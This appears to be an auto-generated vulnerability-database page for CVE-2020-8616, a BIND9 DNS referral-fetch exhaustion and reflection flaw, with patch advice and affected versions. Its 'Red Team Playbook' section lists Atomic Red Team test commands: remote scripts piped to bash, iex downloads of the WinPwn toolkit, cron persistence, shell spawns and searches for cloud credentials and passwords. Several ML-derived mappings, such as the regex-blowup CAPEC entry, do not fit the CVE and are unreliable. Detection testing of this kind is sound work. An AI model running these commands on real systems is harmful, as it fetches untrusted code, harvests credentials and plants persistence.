CVE-2020-8616
Overview
This vulnerability is a resource exhaustion (CWE-400) issue in the ISC BIND9 DNS server related to the referral processing mechanism. The flaw arises from the absence of effective limits on the number of fetches a recursing server performs when handling DNS referrals. Specifically, the recursive resolver component responsible for following referrals can be manipulated to excessively issue fetch requests, impacting the referral resolution process.
Vulnerability Description
A malicious actor who intentionally exploits this lack of effective limitation on the number of fetches performed when processing referrals can, through the use of specially crafted referrals, cause a recursing server to issue a very large number of fetches in an attempt to process the referral. This has at least two potential effects: The performance of the recursing server can potentially be degraded by the additional work required to perform these fetches, and The attacker can exploit this behavior to use the recursing server as a reflector in a reflection attack with a high amplification factor.
Impact
An unauthenticated remote attacker can exploit this vulnerability to degrade the performance of the recursive DNS server by forcing it to perform excessive fetch operations. Additionally, the attacker can leverage the server as a reflector in high-amplification DNS reflection attacks, amplifying denial-of-service traffic against third-party targets. This requires only network access to the recursive server and no user interaction, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.
Solution
Apply patches provided in vendor advisories such as Debian DSA-4689 and Ubuntu USN-4365-1/2, which address this issue in ISC BIND9. Refer to the ISC knowledge base article at https://kb.isc.org/docs/cve-2020-8616 for detailed patch instructions. Updating to the fixed BIND9 versions recommended by these advisories is the primary remediation step. No specific workarounds are documented in the referenced advisories.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from insufficient limitations on the number of fetches executed when processing DNS referrals within specific versions of the BIND software. This lack of control allows a malicious actor to craft specially designed referrals that can lead a recursing DNS server to perform an excessive number of fetches. The core issue lies in the recursive server's inability to effectively manage the workload generated by these fetches, which can result in significant performance degradation. This situation is exacerbated by the potential for the server to enter a state of resource exhaustion, as it becomes overwhelmed by the volume of requests it must handle.
Exploitation of this vulnerability can occur through various attack vectors. An attacker may initiate a reflection attack by sending a small query that results in a large number of fetches from the vulnerable server. By manipulating the referral responses, the attacker can amplify the traffic directed at a target, effectively using the DNS server as a tool for denial-of-service attacks. This amplification factor can be substantial, allowing attackers to generate a significant amount of outbound traffic with minimal initial input. Furthermore, the attacker can conceal their identity, as the reflected traffic appears to originate from the compromised DNS server, complicating attribution and response efforts.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on BIND for their DNS infrastructure. A successful exploitation can lead to degraded performance of the DNS services, resulting in slow or unresponsive applications and websites. This can affect customer experience, leading to potential loss of revenue and damage to brand reputation. Additionally, the use of the DNS server in reflection attacks can expose organizations to legal liabilities, especially if their infrastructure is leveraged to target third-party entities. The business risk extends beyond immediate operational disruption; it can also involve regulatory scrutiny and compliance issues, particularly in sectors where data protection and service availability are critical.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating BIND to the latest stable versions is crucial, as these updates often include patches that address known vulnerabilities. Network monitoring tools can be employed to identify unusual traffic patterns indicative of reflection attacks or excessive fetch requests. Rate limiting can also be established on DNS servers to control the number of fetches allowed per referral, thereby reducing the risk of resource exhaustion. Additionally, organizations should consider employing DNS security extensions (DNSSEC) to enhance the integrity of DNS responses and mitigate the risk of malicious referrals.
In conclusion, the vulnerability stemming from the lack of effective limitations on fetches during DNS referral processing poses significant risks to organizations utilizing BIND. The potential for exploitation through reflection attacks highlights the importance of robust security measures and proactive management of DNS infrastructure. By adopting comprehensive detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, ensuring the reliability and security of their online services.
Recent telemetry from CSURFACE threat intelligence indicates a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2020-8616, rising by approximately 26.4% to a current level near the 0.19 threshold. This upward trend, while not rapid, suggests growing interest or potential preparatory activity around this vulnerability within attacker communities. Although no new exploit techniques or proof-of-concept codes have been identified, the incremental rise in EPSS underscores a subtle shift in the threat landscape that defenders should monitor closely. The elevated score places this vulnerability in a higher percentile of predicted exploitation likelihood, which may translate to increased scanning or reconnaissance efforts targeting ISC BIND9 servers. Consequently, the risk posture for organizations relying on this DNS software is heightened, warranting continued vigilance despite the absence of confirmed active exploitation campaigns. This development reinforces the need for defenders to maintain robust detection capabilities focused on anomalous referral fetch patterns that could precede exploitation attempts.
Affected Products (20)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Isc | Bind | All |
cpe:2.3:a:isc:bind:*:*:*:*:*:*:*:*
|
|
|
Isc | Bind | All |
cpe:2.3:a:isc:bind:*:*:*:*:*:*:*:*
|
|
|
Isc | Bind | All |
cpe:2.3:a:isc:bind:*:*:*:*:*:*:*:*
|
|
|
Isc | Bind | All |
cpe:2.3:a:isc:bind:*:*:*:*:*:*:*:*
|
|
|
Isc | Bind | All |
cpe:2.3:a:isc:bind:*:*:*:*:*:*:*:*
|
|
|
Isc | Bind | All |
cpe:2.3:a:isc:bind:*:*:*:*:*:*:*:*
|
|
|
Isc | Bind | All |
cpe:2.3:a:isc:bind:*:*:*:*:*:*:*:*
|
|
|
Isc | Bind | 9.12.4 |
cpe:2.3:a:isc:bind:9.12.4:p1:*:*:*:*:*:*
|
|
|
Isc | Bind | 9.12.4 |
cpe:2.3:a:isc:bind:9.12.4:p2:*:*:*:*:*:*
|
|
|
Isc | Bind | 9.9.3 |
cpe:2.3:a:isc:bind:9.9.3:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.10.5 |
cpe:2.3:a:isc:bind:9.10.5:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.10.7 |
cpe:2.3:a:isc:bind:9.10.7:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.3 |
cpe:2.3:a:isc:bind:9.11.3:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.5 |
cpe:2.3:a:isc:bind:9.11.5:s3:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.5 |
cpe:2.3:a:isc:bind:9.11.5:s5:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.6 |
cpe:2.3:a:isc:bind:9.11.6:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.7 |
cpe:2.3:a:isc:bind:9.11.7:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.8 |
cpe:2.3:a:isc:bind:9.11.8:s1:*:*:supported_preview:*:*:*
|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 10.0 |
cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-492 | Regular Expression Exponential Blowup |
30%
|
— | — | |
| CAPEC-227 | Sustained Client Engagement |
30%
|
— | — |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.